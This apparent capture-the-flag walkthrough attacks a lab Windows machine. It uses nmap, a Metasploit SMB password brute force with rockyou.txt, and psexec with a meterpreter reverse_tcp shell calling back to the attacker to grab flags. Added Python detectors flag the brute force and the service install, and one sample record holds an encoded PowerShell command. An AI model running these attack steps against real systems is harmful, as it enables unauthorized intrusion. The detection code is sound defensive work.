PriviaHub Walkthrough : priviahub-101
Welcome to my first article on Medium. Today we will be looking at priviahub-101 from PriviaHub. I specifically chose this machine because it can be a good start for people who want to be penetration testers.
Summary:
- There are two important open ports on the machine: 139 and 445.
- SMB listens on port 139 (NetBIOS) and port 445.
- Port 139: SMB originally ran on top of NetBIOS using port 139. NetBIOS is an older transport layer that allows Windows computers to talk to each other on the same network.
- Port 445: Later versions of SMB (after Windows 2000) began to use port 445 directly on top of TCP. Using TCP allows SMB to work over the internet.
- The machine asks you to brute-force the Administrator account over the SMB service using the rockyou.txt wordlist, then exploit the machine with the Metasploit psexec module and capture the flags.
- Basic Windows privilege escalation with the shell command.
Let’s start with this machine.
The “priviahub-101” machine IP is 172.16.71.175
We are going to apply the usual penetration testing methodology, as we have done before. Let’s start with enumeration to learn as much about the machine as possible.
Enumeration
We are going to start with the nmap scan to gather more information about the services and version running on this machine.
nmap -T4 -A -p- 172.16.71.175
As we can see, ports 139 and 445 are open. If you ask what that means: it shows that SMB is exposed. Server Message Block (SMB) is an application layer (layer 7) protocol that is widely used for file, printer, serial port and named pipe sharing. It is a client-server communication protocol. Let’s run nmap again, this time focused on port 445:
nmap -A -p 445 172.16.71.175
SMB Brute-Force attack
We can use msfconsole to learn more about this machine’s users. We are going to search for smb_login.
And now use the scanner module:
use auxiliary/scanner/smb/smb_login
show options
set RHOSTS 172.16.71.175
set SMBUser Administrator
set PASS_FILE /root/rockyou.txt
run
We used rockyou.txt to find the Administrator password.
If you are wondering where “Administrator” came from: it was written in the machine info.
We found the Administrator password.
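From the blue-team side, the smb_login run above is very noisy: every guess produces a failed network logon (Windows Security event 4625 with LogonType 3) from the same source address, and the successful guess shows up as a 4624 from that address right after. The following is an added example, not part of the original write-up, that flags exactly that pattern over a handful of constructed event records. The field names are a simplified representation of the Windows Security event fields and the source address 172.16.71.50 is made up for the sample.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample events (not real logs): a burst of failed network logons
# (4625, LogonType 3) for Administrator from one source, followed by a success
# (4624) from the same source, plus unrelated noise that must not be flagged.
SAMPLE_EVENTS = [
    {"time": "2024-01-01T10:00:00", "id": 4625, "logon_type": 3, "user": "Administrator", "ip": "172.16.71.50"},
    {"time": "2024-01-01T10:00:01", "id": 4625, "logon_type": 3, "user": "Administrator", "ip": "172.16.71.50"},
    {"time": "2024-01-01T10:00:01", "id": 4625, "logon_type": 3, "user": "Administrator", "ip": "172.16.71.50"},
    {"time": "2024-01-01T10:00:02", "id": 4625, "logon_type": 3, "user": "Administrator", "ip": "172.16.71.50"},
    {"time": "2024-01-01T10:00:02", "id": 4625, "logon_type": 3, "user": "Administrator", "ip": "172.16.71.50"},
    {"time": "2024-01-01T10:00:03", "id": 4624, "logon_type": 3, "user": "Administrator", "ip": "172.16.71.50"},
    {"time": "2024-01-01T10:05:00", "id": 4625, "logon_type": 2, "user": "alice", "ip": "-"},  # local mistyped password
    {"time": "2024-01-01T10:30:00", "id": 4625, "logon_type": 3, "user": "bob", "ip": "172.16.71.60"},  # single failure
]


def detect_smb_bruteforce(events, threshold=5, window_seconds=60):
    """Return one alert per (source ip, account) that accumulates at least
    `threshold` network logon failures inside a sliding window of
    `window_seconds`. If a network logon for the same pair succeeds after the
    alert fired, the alert is marked success_after=True (password likely guessed)."""
    events = sorted(events, key=lambda e: e["time"])  # ISO-8601 strings sort chronologically
    window = timedelta(seconds=window_seconds)
    failures = defaultdict(deque)  # (ip, user) -> timestamps of failures still inside the window
    alerts = {}                    # (ip, user) -> alert record

    for ev in events:
        # Only network logons (type 3) with a remote address are relevant to SMB guessing.
        if ev["logon_type"] != 3 or ev["ip"] in ("-", "", None):
            continue
        key = (ev["ip"], ev["user"])
        ts = datetime.fromisoformat(ev["time"])

        if ev["id"] == 4625:
            recent = failures[key]
            recent.append(ts)
            while recent and ts - recent[0] > window:  # drop failures that fell out of the window
                recent.popleft()
            if len(recent) >= threshold and key not in alerts:
                alerts[key] = {
                    "ip": ev["ip"],
                    "user": ev["user"],
                    "failures": len(recent),
                    "first_failure": recent[0].isoformat(),
                    "success_after": False,
                }
        elif ev["id"] == 4624 and key in alerts:
            alerts[key]["success_after"] = True

    return list(alerts.values())


if __name__ == "__main__":
    for alert in detect_smb_bruteforce(SAMPLE_EVENTS):
        print(alert)
```

The threshold and window are deliberately small so the sample triggers; in production you would tune them to the environment and, more importantly, treat a 4624 that follows an alert from the same source as the high-priority signal, since that is the moment the wordlist attack succeeded.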
Exploitation
We will use this information with the Metasploit psexec module.
User : “Administrator” Password : “111111”
And then the last step is the psexec module.
We are going to search for smb psexec.
And now use the exploit module:
use exploit/windows/smb/psexec
set PAYLOAD windows/meterpreter/reverse_tcp
show options
set RHOSTS 172.16.71.175
set SMBUser Administrator
set SMBPass 111111
set LHOST tun0
set LPORT 443
set TARGET 2
exploit
We are inside the machine.
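The psexec module gets its shell by installing a Windows service under a randomly chosen name on the target, which is why defenders watch the System log for event 7045 (“A new service was installed”). The following is an added example, not part of the original write-up, that triages constructed 7045 records with three heuristics: a random-looking service name (many upper/lower case transitions), a service binary dropped straight into the Windows root (what the ADMIN$ share maps to), and an encoded PowerShell command used as the image path. The sample records are constructed; the two suspicious ones imitate the shape of such installs but are not copied from any real tool output.

```python
import re

# Constructed sample System-log events (Event ID 7045), reduced to the fields a
# detection rule needs. The first two are ordinary installs, the last two are
# shaped like remote service-based execution. None of these are real logs.
SAMPLE_7045 = [
    {"service": "Spooler", "image": r"C:\Windows\System32\spoolsv.exe", "start": "auto", "account": "LocalSystem"},
    {"service": "gupdate", "image": r"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /svc", "start": "auto", "account": "LocalSystem"},
    {"service": "HqYwTkXbPe", "image": r"%SYSTEMROOT%\HqYwTkXbPe.exe", "start": "demand", "account": "LocalSystem"},
    {"service": "oQiZtRnLmw", "image": r"%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e SQBFAFgA", "start": "demand", "account": "LocalSystem"},
]


def case_transitions(name):
    """Count how often consecutive letters switch between upper and lower case.
    Real service names ('Spooler', 'WinDefend') have one or two transitions;
    generated names ('HqYwTkXbPe') flip almost every character."""
    letters = [c for c in name if c.isalpha()]
    return sum(1 for a, b in zip(letters, letters[1:]) if a.isupper() != b.isupper())


def score_service_install(ev):
    """Return the list of reasons a 7045 record looks suspicious (empty = benign)."""
    reasons = []
    name = ev["service"]
    image = ev["image"].lower()

    if len(name) >= 8 and name.isalpha() and case_transitions(name) >= 3:
        reasons.append("random-looking service name")

    # A bare executable sitting directly under %SYSTEMROOT% / C:\Windows (the ADMIN$ share),
    # rather than in System32 or a vendor directory, is how an uploaded binary appears.
    if re.match(r"^(%systemroot%|c:\\windows)\\[^\\]+\.exe$", image):
        reasons.append("service binary placed directly in the Windows root (ADMIN$)")

    # Services that are really a one-shot command: a named pipe redirect or encoded PowerShell.
    if "\\\\.\\pipe\\" in image:
        reasons.append("service image redirects to a named pipe")
    if "powershell" in image and re.search(r"\s-(e|ec|enc|encodedcommand)\s", image):
        reasons.append("encoded PowerShell in service image path")

    return reasons


def triage_service_installs(events):
    """Return [(service name, reasons)] for every record with at least one reason."""
    flagged = []
    for ev in events:
        reasons = score_service_install(ev)
        if reasons:
            flagged.append((ev["service"], reasons))
    return flagged


if __name__ == "__main__":
    for service, reasons in triage_service_installs(SAMPLE_7045):
        print(service, "->", "; ".join(reasons))
```

Pair this with the Security-log view (event 4697 records the same install with the account that performed it, and the SMB logon that preceded it comes from the same source address), and the whole chain in this write-up, from the wordlist guessing to the service install, is visible in two event IDs.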
Privilege Escalation
Then we can run sysinfo to learn about this machine’s system information.
We can use the shell command to get a Windows command prompt and take control from there.
We enumerate the file system to grab the user.txt and root.txt flags.
We found the user flag.
We found the root flag.
And our last step here is getting the root flag.
Hope you guys enjoyed this tutorial, let me know if you try this out. Follow me for more projects like this!